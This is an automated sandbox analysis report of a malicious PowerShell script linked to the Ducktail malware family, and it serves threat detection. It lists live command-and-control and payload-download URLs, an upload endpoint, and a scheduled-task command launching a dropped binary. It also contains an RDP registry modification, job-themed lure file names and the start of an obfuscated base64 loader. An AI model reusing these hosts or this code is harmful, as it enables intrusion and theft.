http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000004.00000002.3512132506.000002B48137C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ac	powershell.exe, 00000008.00000002.3831537178.00000223CD5FD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000004.00000002.3512132506.000002B480E2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD4491000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/MartinKuschnik/WmiLight	svczHost.exe, 0000000C.00000002.4735951323.000002C4B0A48000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.pngh	powershell.exe, 00000004.00000002.3512132506.000002B4814CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 00000008.00000002.4512239219.00000223E67F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsof/crl/products/MicTimStaPCA_2010-07-01.crl0Z	powershell.exe, 00000004.00000002.3535529194.000002B4FB435000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be	powershell.exe, 00000000.00000002.3608263403.0000015F80673000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsof	powershell.exe, 00000004.00000002.3535529194.000002B4FB435000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microQI	powershell.exe, 00000014.00000002.4095227779.0000024E63E66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibilityY	svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pesterh	powershell.exe, 00000004.00000002.3512132506.000002B4814CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlh	powershell.exe, 00000004.00000002.3512132506.000002B4814CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.c	powershell.exe, 00000010.00000002.4147110154.000002AAEBE2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	powershell.exe, 00000000.00000002.3644439665.0000015FEBCBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3533295106.000002B4FAF70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4436671344.00000223E52D4000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4740236160.0000030543F00000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACD38000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACCF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4147110154.000002AAEBE44000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.3608263403.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD39E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	powershell.exe, 00000010.00000002.4136909303.000002AAEBAE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000004.00000002.3512132506.000002B48137C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngXz	powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.179.67	kingsmaker.ca	United States		13335	CLOUDFLARENETUS	true
23.88.71.29	unknown	United States		18978	ENZUINC-US	false

Private

IP
127.0.0.2

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565059
Start date and time:	2024-11-29 09:20:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kingsmaker_4.ca.ps1
Detection:	MAL
Classification:	mal100.troj.expl.evad.winPS1@75/54@1/3
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 184.28.81.200, 184.28.81.231, 184.28.98.102, 184.28.98.118, 184.28.98.83, 184.28.98.93, 184.28.98.71, 184.28.98.80, 74.125.137.94, 142.250.101.94
Excluded domains from analysis (whitelisted): acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, www.gstatic.com, acroipm2.adobe.com
Execution Graph export aborted for target myRdpService.exe, PID 8396 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3068 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4932 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5464 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6368 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6500 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8976 because it is empty
Execution Graph export aborted for target svczHost.exe, PID 3468 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: kingsmaker_4.ca.ps1

Simulations

Behavior and APIs

Time	Type	Description
03:22:07	API Interceptor	250x Sleep call for process: powershell.exe modified
03:24:09	API Interceptor	17x Sleep call for process: myRdpService.exe modified
09:22:49	Task Scheduler	Run new task: zServicecakoi7 path: C:\Windows\Temp\svczHost.exe s>cakoi7 kingsmaker.ca

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.67	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
23.88.71.29	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Facebook_Advertiser_Position_Description.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
kingsmaker.ca	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	104.21.75.170
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ENZUINC-US	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	23.88.71.29
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	107.183.1.46
	splarm.elf	Get hash	malicious	Unknown	Browse	104.151.69.247
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	23.244.45.50
CLOUDFLARENETUS	specifications.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.90.137
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	172.64.41.3
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	104.21.16.9
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	104.31.72.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	172.67.179.67
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\myRdpService.exe	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse
	Facebook_Advertiser_Position_Description.lnk	Get hash	malicious	Ducktail	Browse

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035004, file counter 33, database pages 17, cookie 0x5, schema 4, UTF-8, version-valid-for 33
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	4.361028488040223
Encrypted:	false
SSDEEP:	384:eeEThgtEL38/GGN5ptmGQen3xx2ZszKhivC5vxwRv0ZsLRGV:BclGpBgZs/l0ZsLU
MD5:	7831546EC23551A5D60FEA54CE8DF0CD
SHA1:	4429FD416515D6D9146220A853536F2371600FA9
SHA-256:	358BF580EDE6549834CC8F75FAC7A2C4AD96295A7836EB712B63709630CA7BC7
SHA-512:	937FAFADE1C8BFFB25117410FFB261EA2EA8526C5477D1B664C1184E25A6D1A99D8D6510EAB2E14A479B502BF84D372842D31D6D25E117CEBC31871C71C6C420
Malicious:	false
Preview:	SQLite format 3......@ ...!...................................................................!..O\|......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20051
Entropy (8bit):	5.024314565257015
Encrypted:	false
SSDEEP:	384:Prib43WKmVoGIpN6KQkj2Fkjh4iUxDhQIe3zUpX+OdBNNXp5yvOjJlYoaYpib47:PRWKmV3IpNBQkj2Uh4iUxDhi3zUpX+Oh
MD5:	41A553659658912065E8C36A0986B3FC
SHA1:	4375322340AD922F4527F413F686054324D4A839
SHA-256:	BF150150AC83E00846E4165E426DD8D3D0B5B357F1BE43168DBB3073EDE74B01
SHA-512:	FD5DE346A92BEFF1789369FAEB2F28F4D900288CBEABBC3ADD41E6AB7C693ABA34024441FE0127EF5286F47EE8392C09324B3E1913B0B27392FB2A0683E506A5
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 29 08:22:07 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	4.008201744523726
Encrypted:	false
SSDEEP:	24:HYm908NYirmHWwK1mNII+ycuZhNbSakSwzPNnqSSd:i8DmVK1mu1ulbSa3w5qSC
MD5:	231EBF1BCDE3C0F8187ADE2200A11FB9
SHA1:	8119F8133BC6708BACA6966E6F349B4CCFF9956A
SHA-256:	B98409DC11CE09DFD80ECC4A161CBC26BAE0BCEC88B583B39526475D34DB203F
SHA-512:	FD8B557433A0C244FBD5B9ECBB80F4D126E22A07C3E5EF4CA9CDFA4196378E5082713CD88D09319CE4C520DA83186991EFABABA4E5D10B5A650129586E7DC2D9
Malicious:	false
Preview:	L....yIg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\qlxhihga\CSCB3BD9BA87EAD4F1291288FCEAEB15417.TMP........................g.P................5.......C:\Users\user\AppData\Local\Temp\RES4364.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.l.x.h.i.h.g.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

Process:	C:\Windows\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	5492
Entropy (8bit):	3.2564408602149646
Encrypted:	false
SSDEEP:	96:0PVJqMXWMRUYSFd5YtU6W66zpVwkP9Odgd8zkFJdlzOkJdB0u1Jd8ui4c4d8zB/H:sVJqgUZ/5+g7P94RgFx9R43Zy1TbZH56
MD5:	A766DECEF71813234AAF41DB4EF5086E
SHA1:	564473B1CB74ED13E820C62F30642836B8D983C6
SHA-256:	8CA780CD4F6488CBBB1B6999D935B4F8352B36B3E2E1E54301875C6483A87535
SHA-512:	C3CF7BADAD40C63C0479DD7A50762968038A9D402E8AE34697F30D09E206D5D090270013504B801EECB82D234280535E21629A6F23F1F04CE1CF2D3EF0C37051
Malicious:	true
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.Y.S.T.E.M.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.T.e.r.m.S.e.r.v.i.c.e.].....".D.e.p.e.n.d.O.n.S.e.r.v.i.c.e.".=.h.e.x.(.7.).:.5.2.,.0.0.,.5.0.,.0.0.,.4.3.,.0.0.,.5.3.,.0.0.,.5.3.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.....".D.e.s.c.r.i.p.t.i.o.n.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.7.".....".D.i.s.p.l.a.y.N.a.m.e.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.8.".....".E.r.r.o.r.C.o.n.t.r.o.l.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.....".F.a.i.l.u.r.e.A.c.t.i.o.n.s.".=.h.e.x.:.8.0.,.5.1.,.0.1.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.3.,.0.0.,.0.0.,.0.0.,.1.4.,.0.0.,.0.0.,.\..... . .0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.....".I.m.a.g.e.P.a.t.h.".=.h.e.x.

File type:	ASCII text, with very long lines (1851)
Entropy (8bit):	5.92783005215333
TrID:
File name:	kingsmaker_4.ca.ps1
File size:	6'415 bytes
MD5:	26b9748c7c6e3aeaed7a96eb26cb8277
SHA1:	d3a67c19c99e205a552cbb875a7465591e938326
SHA256:	85794de1be32ab105557d079db6f6b1b1b1f67bc37e887e9cdafa9d817dbb59e
SHA512:	ded04039042632d25ae5060724ba01aac2901debe12a5e33f23fdae0c74f4d0c07575dd2c6a7b3626c53125a216a791248f7361e37f7483b4444835ff28ad5e2
SSDEEP:	192:FPBByEx0EXz5MPnlP1nQZ8QP/axPhnhPDPtPTPGPNAPpPdPNP1PDP7PfPpPSPwPI:FPjyOzj5MPlP1nqP/axPfPDPtPTPGPG6
TLSH:	57D154706F15EB4C46F0169A9509E8D593340BBD2724BCD9BBC7EC99C2D21D23A7B328
File Content Preview:	$gubmwiqlc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UmhJRDBnVzFONWMzUmxiUzVWY21sZE9qcEZjMk5oY0dWRVlYUmhVM1J5YVc1bktDSjFibXR1YjNkdU9pSWdLeUFrWHk1RmVHTmxjSFJwYjI0dVRXVnpjMkZuWlNrZ2ZUc05DaVIwSUQwZ0tFZGxkQzFEYVcxSmJuTjBZVzVq

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 09:22:10.131520033 CET	61289	53	192.168.11.20	1.1.1.1
Nov 29, 2024 09:22:10.303678989 CET	53	61289	1.1.1.1	192.168.11.20

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:22:51.755048037 CET	72	OUT	GET /api/check HTTP/1.1 Host: kingsmaker.ca Connection: Keep-Alive
Nov 29, 2024 09:22:52.234801054 CET	1289	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UsDqe9cLUmmBOaxTx61f9tHQkkIIN9hzrLBMvnta6xRLn9%2BSX8pBcLm5wdbSkFV9wcahCUXM6HSjhYXkyCuRHRYn0DYbdfI3zjDMmkRSrjnjyKoCp%2B2yzIHIZeWBN%2FxDE2ReDkgNb9hY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12035&min_rtt=960&rtt_var=19520&sent=5955&recv=2849&lost=0&retrans=0&sent_bytes=8410303&recv_bytes=51358&delivery_rate=20207612&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1313dfbbd0acf-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158910&min_rtt=158910&rtt_var=79455&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=72&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 33 0d 0a 31 37 33 32 38 36 38 35 37 32 7c 56 71 4b 31 79 70 6c 34 32 55 6c 43 68 41 2b 49 49 45 74 57 54 6d 48 37 2b 68 6d 55 66 36 6a 77 43 6c 4b 6d 47 6a 59 51 44 49 6a 67 4a 66 39 45 6b 